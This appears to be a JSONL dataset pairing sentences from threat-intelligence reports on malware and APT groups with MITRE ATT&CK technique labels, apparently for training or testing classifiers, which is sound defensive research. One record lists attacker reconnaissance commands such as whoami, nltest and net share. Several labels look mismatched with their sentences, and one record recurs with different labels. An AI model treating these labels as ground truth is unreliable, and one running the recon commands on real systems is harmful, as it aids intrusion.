{"text1":"SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component","labels":"['T1055.001', 'T1105']"}
{"text1":"This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon\u2019s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail","labels":"['T1005']"}
{"text1":"Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container","labels":"['T1134.001']"}
{"text1":"One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs","labels":"['T1071.001']"}
{"text1":"The implementation details of Seaduke also have some similarities to WellMess, as both use encrypted cookies to transfer metadata about the data being sent and use obfuscated base64 data in HTTP requests as the contents of communications. These techniques are not unique to Blue Kitsune but provide an interesting correlation between the WellMess backdoor and Blue Kitsune tools used since 2015","labels":"['T1071.001']"}
{"text1":"1) The group delivers a malicious Office lure document to victims, most likely via a spear-phishing email. 2) These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they\u2019re effective","labels":"['T1566.001']"}
{"text1":"In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks","labels":"['T1569.002', 'T1543.003']"}
{"text1":"DOMAIN} nltest \/domain_trusts \/all_trusts net share route print netstat -nao net localgroup qwinsta WMI Query ROOT\\CIMV2:Win32_BIOS WMI Query ROOT\\CIMV2:Win32_DiskDrive WMI Query ROOT\\CIMV2:Win32_PhysicalMemory WMI Query ROOT\\CIMV2:Win32_Product WMI Query ROOT\\CIMV2:Win32_PnPEntity - whoami \/all - arp -a - ipconfig \/all - net view \/all - cmd \/c set - - nltest \/domain_trusts \/all_trusts - net share - route print - netstat -nao - net localgroup - qwinsta - WMI Query ROOT\\CIMV2:Win32_BIOS - WMI Query ROOT\\CIMV2:Win32_DiskDrive - WMI Query ROOT\\CIMV2:Win32_PhysicalMemory - WMI Query ROOT\\CIMV2:Win32_Product - WMI Query ROOT\\CIMV2:Win32_PnPEntity","labels":"['T1047']"}
{"text1":"Once gaining the initial foothold into a container, Hildegard establishes either a tmate session or an IRC channel back to the C2. It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose. Unit 42 researchers have not observed any commands in the IRC channel. However, the IRC server's metadata indicates that the server was deployed on Jan","labels":"['T1071']"}
{"text1":"Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking","labels":"['T1543.003', 'T1055']"}
{"text1":"This component overwrites the master boot record (MBR) of an infected host with a malicious 16-bit bootloader with a SHA256 hash of","labels":"['T1561.002']"}
{"text1":"Analysis of BRONZE BUTLER's operations, targeting, and capability led CTU researchers to assess that it is likely that the group is located in the PRC. The group has used spearphishing, strategic web compromises (SWCs), and an exploit of a zero-day vulnerability to compromise targeted systems. After exfiltrating targeted data from a network, BRONZE BUTLER typically deletes evidence of its activities. However, it maintains access to compromised environments when possible, periodically revisiting compromised sites to identify new opportunities for data exfiltration","labels":"['T1087.002']"}
{"text1":"Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB","labels":"['T1560.003', 'T1074.001']"}
{"text1":"The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen","labels":"['T1087.001', 'T1098', 'T1136.001', 'T1564.002']"}
{"text1":"At this point the C2 sends a JSON with commands to execute, including uploading\/downloading files, taking a screenshot and finding *.rar archives on the host","labels":"['T1041']"}
{"text1":"The captured sample used in this analysis is an MSI file named \u201cview-(AVISO)2020.msi\u201d that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS","labels":"['T1218.007']"}
{"text1":"After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems","labels":"['T1070', 'T1114.002']"}
{"text1":"In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software \"comment\" features on web pages as a tool to infiltrate target computers","labels":"['T1189']"}
{"text1":"The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege","labels":"['T1518.001']"}
{"text1":"We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command","labels":"['T1049', 'T1069.001']"}
{"text1":"Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files","labels":"['T1047', 'T1490']"}
{"text1":"Deriving C2 URLs from a Domain Generation Algorithm (DGA) using lists of domain names, subdomains, top-level domains (TLDs), Uniform Resource Identifiers (URIs), file names, and file extensions","labels":"['T1568.002']"}
{"text1":"These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns","labels":"['T1105']"}
{"text1":"Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine","labels":"['T1486']"}
{"text1":"In a new sample of the REvil ransomware discovered by\u00a0MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device","labels":"['T1562.009']"}
{"text1":"The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads","labels":"['T1105', 'T1082']"}
{"text1":"Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers","labels":"['T1566']"}
{"text1":"The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution","labels":"['T1091']"}
{"text1":"Basic system enumeration \u2013 The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module","labels":"['T1082']"}
{"text1":"Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt","labels":"['T1119']"}
{"text1":"Reports system hardware and software configuration. This built-in utility is a command line version of the System Information.app (\/Applications\/Utilities\/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis","labels":"['T1082']"}
{"text1":"As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers","labels":"['T1140']"}
{"text1":"In late July 2021, we identified an ongoing spear phishing campaign pushing Konni Rat to target Russia. Konni was first observed in the wild in 2014 and has been potentially linked to the North Korean APT group named APT37","labels":"['T1566.001']"}
{"text1":"The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP","labels":"['T1055.001']"}
{"text1":"The HTTP variant checks if Kaspersky is installed on the victim\u2019s machine by searching for the existence of files in the Kaspersky installation folder","labels":"['T1518.001']"}
{"text1":"The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server","labels":"['T1113', 'T1057', 'T1120', 'T1082']"}
{"text1":"PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage","labels":"['T1218.005']"}
{"text1":"We observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor","labels":"['T1566.001']"}
{"text1":"These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails","labels":"['T1135']"}
{"text1":"The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component","labels":"['T1036.005']"}
{"text1":"Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past","labels":"['T1566.001', 'T1566.002']"}
{"text1":"Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT\/Linux security battleground","labels":"['T1053.003']"}
{"text1":"Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction","labels":"['T1071.004']"}
{"text1":"It writes a file using two data structures: one associated with the file and other used for reading data from the C&C","labels":"['T1070']"}
{"text1":"The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space","labels":"['T1070.004', 'T1485']"}
{"text1":"Download and execution of ntbscan (SHA-1: 90da10004c8f6fafdaa2cf18922670a745564f45) \u2013 NetBIOS scanner tool widely used by multiple APT actor including the prolific Chinese group APT10 - Execution of Windows built-in networking utility tools - Access to the victim\u2019s files, especially documents located on the Desktop","labels":"['T1083']"}
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda","labels":"['T1036.005']"}
{"text1":"As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL","labels":"['T1055.001']"}
{"text1":"4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid \u2013 using the AES and RSA algorithms","labels":"['T1573.002', 'T1486']"}
{"text1":"The tool was primarily used by the attackers to move laterally on the victim\u2019s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations","labels":"['T1048.003']"}
{"text1":"While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature","labels":"['T1106']"}
{"text1":"Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5","labels":"['T1071.001']"}
{"text1":"IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers","labels":"['T1087.003']"}
{"text1":"Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019. This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file. Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files","labels":"['T1218.002']"}
{"text1":"The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files","labels":"['T1136', 'T1047', 'T1070.001', 'T1003.001']"}
{"text1":"3, 2019):\u00a0On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33 activity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet","labels":"['T1068']"}
{"text1":"The malware sets its persistence mechanism by creating a RunKey in the registry to ensure its survival after system reboot events","labels":"['T1547.001']"}
{"text1":"Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim\u2019s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button","labels":"['T1123']"}
{"text1":"HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059.003']"}
{"text1":"One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz","labels":"['T1083']"}
{"text1":"The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2","labels":"['T1059.003']"}
{"text1":"In 2014, Imminent Monitor started supporting third-party plugins. The first of these offered the ability to turn the webcam light off while monitoring. Shockwave\u2122 wrote: \u201cHey, good job on being the first to release a plugin for Imminent Monitor","labels":"['T1125']"}
{"text1":"Where the number of passed parameters is one, the payload will read the sys.bin.url file from %appdata%\\systemconfig. It will then spawns a new svchost process as C:\\\\windows\\\\system32\\\\svchost.exe \u2013k update in suspended state and injects the payload. Finally, it patches the entry point of svchost.exe so it can execute the malicious payload after the ResumeThread call","labels":"['T1055.012']"}
{"text1":"This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits","labels":"['T1005']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration","labels":"['T1041', 'T1140']"}
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON","labels":"['T1105']"}
{"text1":"The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest","labels":"['T1021.006']"}
{"text1":"It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. CTU\u2122 researchers attribute GandCrab to the GOLD GARDEN threat group","labels":"['T1190', 'T1133']"}
{"text1":"CWS or WSA web scanning prevents access to malicious websites, including watering hole attacks, and detects malware used in these attacks","labels":"['T1189']"}
{"text1":"The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation","labels":"['T1059.001', 'T1027']"}
{"text1":"BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure. The threat actors also integrate infrastructure they likely previously compromised for espionage purposes. For example, CTU researchers identified the group using IP addresses owned by several, presumably compromised, research organizations to interact with web shells in other target environments","labels":"['T1003.002', 'T1003.004']"}
{"text1":"As mentioned previously, this backdoor also supports loading plugins. The server creates a thread that searches for files matching the following pattern lPH*.dll. If such a file exists, it is loaded and its export function ModuleStart is called. Among the various plugins we have located so far, one is able to steal recent files and files from USB thumb drives","labels":"['T1025', 'T1083']"}
{"text1":"Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. The attackers also made extensive use of Hostinger\u2019s cheap web hosting services to deliver initial payloads","labels":"['T1204.001']"}
{"text1":"After decrypting the C&C server address, the shellcode proceeds to send an HTTP GET request to fetch the resource: \u201cmsdn.cpp\u201d on the\u00a0server","labels":"['T1071.001']"}
{"text1":"The purpose of the bytecode is to decrypt the embedded payload, load it into memory reflectively and execute it","labels":"['T1140']"}
{"text1":"The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement","labels":"['T1105']"}
{"text1":"Network analysis \u2014 run one of the plugins to retrieve Active Directory and network information (Fig","labels":"['T1016']"}
{"text1":"Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with \u201cavp. presumably in an attempt to find Kaspersky\u2019s antivirus process. If the process is found, the shellcode will not open the decoy document and exits","labels":"['T1057']"}
{"text1":"This RAT is also known for its keylogging and file transfer functionality. As such, any remote attacker can load any files onto the infected machine or even steal documents","labels":"['T1036.005', 'T1105']"}
{"text1":"The malware will setup the miner and then the miner will persist it in the system in two ways: 1) by adding itself as a service\u00a0if the malware gains admin privileges or 2) by adding the batch file to the startup folder","labels":"['T1543.003']"}
{"text1":"Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain","labels":"['T1105']"}
{"text1":"An example of these tasks is shown below: \u2022 write a file and execute it with CreateProcess() capturing all of the standard output \u2022 update C&C configuration, plugin storage, etc \u2022 update autoruns \u2022 write arbitrary files to the filesystem (\u201cFile Upload\u201d) \u2022 read arbitrary files from the filesystem (\u201cFile Download\u201d) \u2022 update itself \u2022 uninstall \u2022 push task results to C2 servers","labels":"['T1105']"}
{"text1":"Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. Whitelists files, folders and extensions from encryption. Encrypts files on local and network storage. Customizes the name and body of the ransom note, and the contents of the background image. Exfiltrates encrypted information on the infected host to remote controllers. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers","labels":"['T1486']"}
{"text1":"In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration","labels":"['T1059.001']"}
{"text1":"Once you have set up the database and logged into the BloodHound web application, you need to pull AD data from your environment using the BloodHound PowerShell ingestor. Figure 1 shows a sample command that searches all domains in the forest (-SearchForest) and the folder location used to save the resulting CSV files","labels":"['T1059.001']"}
{"text1":"If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock","labels":"['T1016']"}
{"text1":"This Unix binary is widely used by many malware families to determine the device\u2019s unique ID (for campaign tracking), usually in the form of the machine\u2019s serial number. This may or may not be hashed with another utility (e.g. md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment","labels":"['T1497.001']"}
{"text1":"It uses a GetCurrentProcessID to find the process ID of the current process. It compares the UniqueProcessID\u00a0member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID","labels":"['T1057']"}
{"text1":"Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range","labels":"['T1102.001']"}
{"text1":"The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script","labels":"['T1204.002']"}
{"text1":"1) The malicious macro scans the victim\u2019s Outlook inbox and looks for the strings \u201c$$cpte\u201d and \u201c$$ecpte\u201d. 2) Then the macro will open a CMD shell that will execute whatever instruction \/ command is in between the strings. 4) The macro searches for the special strings in the \u201cDeleted Items\u201d folder to find the attacker\u2019s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers","labels":"['T1566.001']"}
{"text1":"A recent lull in the distribution of spam spreading information-stealing malware via\u00a0the Hancitor downloader has been snapped","labels":"['T1566.002']"}
{"text1":"There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + \u201c\/images\/\u201d + encoded_data + (.jpeg||.gif||.bmp","labels":"['T1132']"}
{"text1":"Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist","labels":"['T1567.002']"}
{"text1":"They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies","labels":"['T1490']"}
{"text1":"Emotet artifacts are typically found in arbitrary paths located off of the AppData\\Local and AppData\\Roaming directories. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services","labels":"['T1053.005']"}
{"text1":"The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome","labels":"['T1056.001']"}
{"text1":"Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for","labels":"['T1567.002']"}
{"text1":"The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an \u2018incorrect\u2019 directory \u2013 such as a potential automated sandbox \u2013 it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process","labels":"['T1083', 'T1497.001']"}
{"text1":"Before being sent to the server, the data structure has to pass through shaping as shown in Fig","labels":"['T1560']"}
{"text1":"When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode","labels":"['T1071.001']"}
{"text1":"For persistence and remote control, the script downloads another base64-encoded Python script from hxxps:\/\/ptpb[.]pw\/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control","labels":"['T1027']"}
{"text1":"The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment \u201cone line shellcode injection with native x86 shellcode","labels":"['T1105']"}
{"text1":"Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A","labels":"['T1583.001']"}
{"text1":"For example, here is a folder and a list of files created by picking the C:\\Windows\\system32\\TCPSVCS.exe executable as a source of data","labels":"['T1543.003']"}
{"text1":"The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named \u201cReaver\u201d. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown","labels":"['T1071.001', 'T1095']"}
{"text1":"Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value","labels":"['T1105', 'T1573.002']"}
{"text1":"When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution","labels":"['T1218.010']"}
